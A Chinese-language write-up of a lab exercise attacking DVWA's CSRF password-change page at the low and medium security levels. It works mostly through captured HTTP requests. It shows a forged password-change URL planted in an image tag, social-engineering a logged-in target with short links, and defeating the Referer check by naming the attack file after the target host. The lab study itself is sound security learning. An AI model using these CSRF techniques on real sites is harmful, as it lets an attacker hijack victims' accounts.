CSRF

0x01 low

跨站，输入密码和确认密码直接写在url中，将连接分享给目标，点击后修改密码
社工方式让目标点击短链接

伪造404页，在图片中写路径为payload，目标载入网页自动请求构造链接，目标被攻击

http://dvt.dv/learndvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
观察到url中的修改信息

目标的网站应当处于登录状态才可攻击成功

恶意网页如下，尝试攻击

目标访问，抓包观察

GET /att/tforc.html HTTP/1.1
Host: dvt.dv
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: security=medium; PHPSESSID=3ejpptkt8se4a8r4o5vftooj32
Connection: close

第一个包，访问页面

GET /learndvwa/vulnerabilities/csrf/?password_new=bbb&password_conf=bbb&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://dvt.dv/att/tforc.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: security=medium; PHPSESSID=3ejpptkt8se4a8r4o5vftooj32
Connection: close

第二个包，请求img标签中的src值

目标的密码被修改，利用成功

0x02 medium

stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false
增加过滤，检测请求头中的reffer，请求头中的host由$_SERVER[‘SERVER_NAME’]获取。referer中出现host，检测为来源自本host，才能使用修改密码功能

在referer中出现host的值能通过。虑构造.html文件的文件名为利用网站的host，这样能绕过检测。或将.html放在服务器中包含目标host值的目录中

Low级别的图片演示不妥，我直接在网站下建个文件夹放恶意.html文件，真实情况下这种条件不可能发生

演示命名文件名

GET /noSpecialFilderName/dvt.dv.html HTTP/1.1
Host: attack.at
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
If-None-Match: "11a-615565ab38c9e"
If-Modified-Since: Fri, 05 Apr 2024 09:48:13 GMT
Connection: close

GET /learndvwa/vulnerabilities/csrf/?password_new=file&password_conf=file&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://attack.at/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

呵呵，谷歌给referer作截断

手动修改

GET /learndvwa/vulnerabilities/csrf/?password_new=file&password_conf=file&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://attack.at/noSpecialFilderName/dvt.dv.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

GET /learndvwa/login.php HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://attack.at/noSpecialFilderName/dvt.dv.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

后面的包也改一下
不太成，不知道为啥XD，现代浏览器都不这么干了捏

尝试恶意host

GET /learndvwa/vulnerabilities/csrf/?password_new=att&password_conf=att&Change=Change HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://hstnmdvt.dv/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

这个包能改成

这个也能成